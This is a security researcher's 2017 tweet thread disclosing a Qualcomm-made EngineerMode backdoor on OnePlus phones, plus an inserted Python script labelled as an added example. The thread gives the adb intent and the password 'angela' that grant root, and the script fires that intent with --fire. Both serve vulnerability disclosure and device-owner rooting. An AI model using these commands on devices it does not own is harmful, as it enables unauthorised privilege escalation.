Baptiste Robert
CEO @PredictaLabOff | French Security Researcher, Ethical Hacking, OSINT

Nov 13, 2017, 34 tweets

<Thread> Hey @OnePlus! I don't think this EngineerMode APK should be in a user build...🤦‍♂️
This app is a system app made by @Qualcomm and customised by @OnePlus. It's used by the operator in the factory to test the devices.

If you have a OnePlus device, I'm pretty sure you have this app pre-installed. To check, open Settings -> Apps -> Menu -> Show system apps and search for EngineerMode in the app list.

With a telephony secret code you can access manual tests like the GPS test and the root status test, as stated in this article xda-developers.com/oneplus-hardwa… pointed out by @AleGrechi. But we can do better...

You can access the "main" activity by sending this command: adb shell am start com.android.engineeringmode/.EngineeringMode
You will have access to everything, not just the manual tests.

Having access to all these functions is a real issue. Combined with this attack, researchcenter.paloaltonetworks.com/2017/09/unit42…, a malicious app can do a lot of things.

I will find time to make a PoC.
But that's not the biggest issue with this app.

DiagEnabled, which is a @Qualcomm-made activity, is the best class in this EngineerMode APK. Check the methods in this activity: escalatedUp(boolean, string) sounds like a cool thing, no? 😀

In the onCreate method, if the intent is not null, the escalatedUp method is called with the parameters enable=true and password=getIntent().getStringExtra("code"). Do you see where I'm going?

The escalatedUp method calls Privilege.escalate(password) and, if the result is true, sets the system properties persist.sys.adbroot and oem.selinux.reload_policy to 1.

So yes, if you send the command adb shell am start -n com.android.engineeringmode/.qualcomm.DiagEnabled --es "code" "password" with the correct code, you can become root!

Here is the Privilege class. Check the name of the native library used to check the code: door... Ladies and gentlemen, please say hi to the backdoor made by @Qualcomm

This lib is located in /system/lib/libdoor.so or /system/lib64/libdoor.so. You can find the sample here: virustotal.com/#/file/3e6df25…

These are the interesting strings of the lib. After a first read we can see that libcrypto is used and that the key and the password are backed up in /data/backup/fpwd and /data/backup/fkey

This is the code responsible for the password verification. First it checks the length, then calculates the hash and compares it to the correct one.

Unfortunately, I didn't find the password, so if some of you are skilled in reversing native libs, your help is very welcome!

If the verification passes, the password hash is stored in /data/backup/fpwd

and the key is made from different build properties like ro.build.type, ro.build.user, ... and stored in /data/backup/fkey

Using @fridadotre and the script attached, I managed to bypass the escalate and isEscalated methods and become root.

Here is the source code of the EngineerMode apk: github.com/fs0c131y/Engin…. Feel free to dig on your own and share your findings!

cc @AndroidAuth @AndroidPolice @androidandme @Androidheadline @AndroidPolice @xdadevelopers @AndroidSPIN @Gadgets360 @TheHackersNews you have a subject here to write an article. It's not normal to have this kind of backdoor in an end-user product...

Any comments from @getpeid @OnePlus or @Qualcomm?

EngineerMode APK is not the only interesting app left by @Oneplus. More threads to come :)

Awesome! Thanks to @insitusec and the @NowSecureMobile team, we have the password! It's now possible to root a @Oneplus device with a simple intent.

I will publish an application on the Play Store to root your @OnePlus device in the next few hours.

cc @JAMESWT_MHT I forgot to add you :)

Difficulty of installing #SuperSu: 0! Everything is already preinstalled 🤔.
The OnePlus root application is coming soon :)

The best thing in this story is the password. It's angela (see the reference?). This backdoor is here intentionally. When fiction becomes reality. Good luck @getpeid, you will need a very good explanation.
cc @whoismrrobot

My Twitter at the moment. Thank you all for the impact you're giving this story!

Once again, this app is a system app made by @Qualcomm. So possibly a lot of @Qualcomm-based phones are affected. Can you open Settings -> Apps -> Menu -> Show system apps and search for EngineerMode in the list to check? If you find the app, reply to this tweet with your device model.

Thanks to you, I now have a sample of the EngineerMode apk from the @Asus Zenfone, @miuirom, @Redmi 3s and @OnePlus 5T. Expect more fun!

I'm still waiting for more samples to confirm, but yes, EngineerMode is installed on the @OnePlus 5T. The DiagEnabled activity is there, so the backdoor is too :)
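An adb-based version of the "is my device affected?" check from the thread, which also builds the DiagEnabled intent the thread uses to flip persist.sys.adbroot. This is an added example, not the author's code or the script attached to the thread. The package, activity, library paths, property names and the code "angela" are all taken from the thread; everything else (adb on PATH, a USB-debugging-enabled device, the script's own `--fire` flag, which is the only thing that actually fires the intent) is this example's assumption.

```python
#!/usr/bin/env python3
"""Probe an adb-attached device for the EngineerMode/DiagEnabled root path.

Added example; not the thread author's code. Assumes adb is on PATH and the
device has USB debugging on. Without `--fire` it only reads state.
"""
import re
import shutil
import subprocess
import sys
from typing import Dict, List, Optional, Set

PACKAGE = "com.android.engineeringmode"                     # from the thread
ACTIVITY = PACKAGE + "/.qualcomm.DiagEnabled"               # from the thread
LIB_PATHS = ("/system/lib/libdoor.so", "/system/lib64/libdoor.so")
ROOT_PROPS = ("persist.sys.adbroot", "oem.selinux.reload_policy")
DEFAULT_CODE = "angela"                                     # password named in the thread

# `getprop` with no arguments prints one "[key]: [value]" per line.
_PROP_RE = re.compile(r"^\[(?P<key>[^\]]+)\]: \[(?P<val>[^\]]*)\]$")


def parse_pm_list(output: str) -> Set[str]:
    """`pm list packages` prints one 'package:<name>' per line."""
    return {
        line.strip()[len("package:"):]
        for line in output.splitlines()
        if line.strip().startswith("package:")
    }


def parse_getprop(output: str) -> Dict[str, str]:
    """Turn full `getprop` output into a {key: value} dict."""
    props: Dict[str, str] = {}
    for line in output.splitlines():
        m = _PROP_RE.match(line.strip())
        if m:
            props[m.group("key")] = m.group("val")
    return props


def build_escalate_cmd(code: str = DEFAULT_CODE, serial: Optional[str] = None) -> List[str]:
    """argv for the intent from the thread: start DiagEnabled with string extra 'code'."""
    cmd = ["adb"]
    if serial:
        cmd += ["-s", serial]
    return cmd + ["shell", "am", "start", "-n", ACTIVITY, "--es", "code", code]


def assess(packages: Set[str], props: Dict[str, str], lib_present: bool) -> Dict[str, bool]:
    """Combine the three observations: app present, libdoor present, root props set."""
    return {
        "engineermode_installed": PACKAGE in packages,
        "libdoor_present": lib_present,
        "adbroot_enabled": all(props.get(p) == "1" for p in ROOT_PROPS),
    }


def _adb(args: List[str], serial: Optional[str] = None) -> str:
    """Run one adb command and return its stdout (empty string on failure)."""
    cmd = ["adb"] + (["-s", serial] if serial else []) + args
    return subprocess.run(cmd, capture_output=True, text=True, check=False).stdout


def main(argv: List[str]) -> int:
    if shutil.which("adb") is None:
        print("adb not found on PATH", file=sys.stderr)
        return 2
    packages = parse_pm_list(_adb(["shell", "pm", "list", "packages"]))
    # `ls <path>` echoes the path back only when the file exists.
    lib_present = any(_adb(["shell", "ls", p]).strip() == p for p in LIB_PATHS)
    before = assess(packages, parse_getprop(_adb(["shell", "getprop"])), lib_present)
    print("before:", before)
    if "--fire" in argv and before["engineermode_installed"]:
        subprocess.run(build_escalate_cmd(), check=False)
        after = assess(packages, parse_getprop(_adb(["shell", "getprop"])), lib_present)
        print("after: ", after)
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv[1:]))
```

Run it once without arguments to see whether the package and libdoor.so are on the device and whether the two properties are already 1; `--fire` then sends the same intent the thread gives and re-reads the properties so you can see them flip.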

Thanks to the awesome @AdrianoDiLuzio, it's pretty easy to install supersu!

Write-up by @AdrianoDiLuzio to root your OnePlus device using the backdoor + #Magisk: gist.github.com/aldur/b785257a…
